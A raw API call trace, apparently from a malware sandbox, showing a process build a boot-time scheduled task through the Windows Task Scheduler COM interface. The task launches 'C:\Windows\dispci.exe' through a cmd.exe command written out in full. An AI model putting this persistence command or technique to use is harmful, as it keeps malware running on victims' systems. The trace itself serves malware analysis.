0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x33) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x2f) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x22) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x22) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x22) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x22) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x2d) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x36) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x33) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x37) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x37) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x37) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x26) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x26) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0017.907] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0017.907] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0017.908] GetLastError () returned 0x0 [0017.908] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.908] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.908] SetLastError (dwErrCode=0x0) [0017.908] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.908] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0017.908] lstrlenW (lpString="MINUTE") returned 6 [0017.908] GetThreadLocale () returned 0x409 [0017.908] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0017.908] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.908] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0017.908] lstrlenW (lpString="HOURLY") returned 6 [0017.908] GetThreadLocale () returned 0x409 [0017.908] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0017.908] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.908] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0017.908] lstrlenW (lpString="DAILY") returned 5 [0017.908] GetThreadLocale () returned 0x409 [0017.908] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0017.908] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.908] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0017.908] lstrlenW (lpString="WEEKLY") returned 6 [0017.908] GetThreadLocale () returned 0x409 [0017.908] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0017.908] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.908] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0017.908] lstrlenW (lpString="MONTHLY") returned 7 [0017.909] GetThreadLocale () returned 0x409 [0017.909] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0017.909] lstrlenW (lpString="ONCE") returned 4 [0017.909] GetThreadLocale () returned 0x409 [0017.909] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0017.909] lstrlenW (lpString="ONSTART") returned 7 [0017.909] GetThreadLocale () returned 0x409 [0017.909] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONSTART", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 2 [0017.909] SetLastError (dwErrCode=0x0) [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0017.909] lstrlenW (lpString="First") returned 5 [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0017.909] lstrlenW (lpString="Second") returned 6 [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0017.909] lstrlenW (lpString="Third") returned 5 [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0017.909] lstrlenW (lpString="Fourth") returned 6 [0017.909] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.909] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0017.909] lstrlenW (lpString="Last") returned 4 [0017.954] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.954] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0017.954] lstrlenW (lpString="First") returned 5 [0017.954] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.954] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0017.954] lstrlenW (lpString="Second") returned 6 [0017.954] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.954] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0017.954] lstrlenW (lpString="Third") returned 5 [0017.954] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.954] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0017.954] lstrlenW (lpString="Fourth") returned 6 [0017.954] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.954] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0017.954] lstrlenW (lpString="Last") returned 4 [0017.954] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xacd58, cchData=128 | out: lpLCData="0") returned 2 [0017.954] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.954] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0017.954] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0017.955] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xacd60, cchData=128 | out: lpLCData="0") returned 2 [0017.955] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.955] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0017.955] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0017.955] GetLocalTime (in: lpSystemTime=0xacf10 | out: lpSystemTime=0xacf10*(wYear=0x7e1, wMonth=0xa, wDayOfWeek=0x4, wDay=0x1a, wHour=0x2, wMinute=0x10, wSecond=0x2b, wMilliseconds=0x183)) [0017.955] GetLocalTime (in: lpSystemTime=0xad32c | out: lpSystemTime=0xad32c*(wYear=0x7e1, wMonth=0xa, wDayOfWeek=0x4, wDay=0x1a, wHour=0x2, wMinute=0x10, wSecond=0x2b, wMilliseconds=0x193)) [0017.955] lstrlenW (lpString="") returned 0 [0017.955] lstrlenW (lpString="") returned 0 [0017.955] lstrlenW (lpString="") returned 0 [0017.955] lstrlenW (lpString="") returned 0 [0017.955] lstrlenW (lpString="") returned 0 [0017.955] lstrlenW (lpString="") returned 0 [0017.955] lstrlenW (lpString="") returned 0 [0017.955] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0017.987] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0018.513] CoCreateInstance (in: rclsid=0x45230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x4520fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xad2e4 | out: ppv=0xad2e4*=0x1c12e0) returned 0x0 [0018.519] TaskScheduler:ITaskService:Connect (This=0x1c12e0, serverName=0xad254*(varType=0x8, wReserved1=0xcc8f, wReserved2=0xd2e8, wReserved3=0xa, varVal1=0x0, varVal2=0xad2cc), user=0xad264*(varType=0x0, wReserved1=0x765b, wReserved2=0x7201, wReserved3=0x50d0, varVal1=0xaedc0, varVal2=0xae1d0), domain=0xad274*(varType=0x0, wReserved1=0x51cf, wReserved2=0xe198, wReserved3=0xa, varVal1=0x45994e, varVal2=0xaf7bc), password=0xad284*(varType=0x0, wReserved1=0x76fd, wReserved2=0x3c, wReserved3=0x0, varVal1=0xcc8f8800, varVal2=0xffffffa3)) returned 0x0 [0018.572] TaskScheduler:IUnknown:AddRef (This=0x1c12e0) returned 0x2 [0018.572] TaskScheduler:ITaskService:GetFolder (in: This=0x1c12e0, Path=0x0, ppFolder=0xad388 | out: ppFolder=0xad388*=0x1c1348) returned 0x0 [0018.573] TaskScheduler:ITaskService:NewTask (in: This=0x1c12e0, flags=0x0, ppDefinition=0xad398 | out: ppDefinition=0xad398*=0x1c1388) returned 0x0 [0018.574] ITaskDefinition:get_Actions (in: This=0x1c1388, ppActions=0xad2e4 | out: ppActions=0xad2e4*=0x1c2760) returned 0x0 [0018.574] IActionCollection:Create (in: This=0x1c2760, Type=0, ppAction=0xad2fc | out: ppAction=0xad2fc*=0x1c2998) returned 0x0 [0018.575] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0018.575] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0018.575] lstrlenW (lpString=" ") returned 1 [0018.575] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x57) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x79) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.575] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x33) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x32) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.576] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.576] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.576] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.576] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x57) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.576] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.577] StrChrW (lpStart=" ", wMatch=0x2d) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.577] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x36) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x33) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x37) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x37) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x37) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.577] StrChrW (lpStart=" ", wMatch=0x26) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x26) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.577] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.577] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0018.577] StrChrIW (lpStart="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit", wMatch=0x20) returned=" /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit" [0018.577] lstrlenW (lpString="/C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 58 [0018.577] lstrlenW (lpString=" ") returned 1 [0018.577] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x2f) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.577] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.577] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.578] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.578] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x57) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x22) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.578] StrChrW (lpStart=" ", wMatch=0x2d) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.578] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x36) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x33) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x37) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x37) returned 0x0 [0018.578] StrChrW (lpStart=" ", wMatch=0x37) returned 0x0 [0018.579] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.579] StrChrW (lpStart=" ", wMatch=0x26) returned 0x0 [0018.579] StrChrW (lpStart=" ", wMatch=0x26) returned 0x0 [0018.579] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0018.579] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0018.579] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0018.579] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0018.579] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0018.579] IUnknown:Release (This=0x1c2998) returned 0x1 [0018.579] IUnknown:Release (This=0x1c2760) returned 0x1 [0018.579] ITaskDefinition:get_Triggers (in: This=0x1c1388, ppTriggers=0xaced0 | out: ppTriggers=0xaced0*=0x1c2818) returned 0x0 [0018.579] ITriggerCollection:Create (in: This=0x1c2818, Type=8, ppTrigger=0xacedc | out: ppTrigger=0xacedc*=0x1c29d8) returned 0x0 [0018.581] IUnknown:QueryInterface (in: This=0x1c29d8, riid=0x451518*(Data1=0x2a9c35da, Data2=0xd357, Data3=0x41f4, Data4=([0]=0xbb, [1]=0xc1, [2]=0x20, [3]=0x7a, [4]=0xc1, [5]=0xb1, [6]=0xf3, [7]=0xcb)), ppvObject=0xacec8 | out: ppvObject=0xacec8*=0x1c29d8) returned 0x0 [0018.581] IUnknown:Release (This=0x1c29d8) returned 0x2 [0018.581] _vsnwprintf (in: _Buffer=0xace40, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xace28 | out: _Buffer="2017-10-26T02:16:00") returned 19 [0018.581] ITrigger:put_StartBoundary (This=0x1c29d8, StartBoundary="2017-10-26T02:16:00") returned 0x0 [0018.581] lstrlenW (lpString="") returned 0 [0018.582] lstrlenW (lpString="") returned 0 [0018.582] lstrlenW (lpString="") returned 0 [0018.582] lstrlenW (lpString="") returned 0 [0018.582] IUnknown:Release (This=0x1c29d8) returned 0x1 [0018.582] IUnknown:Release (This=0x1c2818) returned 0x1 [0018.582] ITaskDefinition:get_Settings (in: This=0x1c1388, ppSettings=0xad2ec | out: 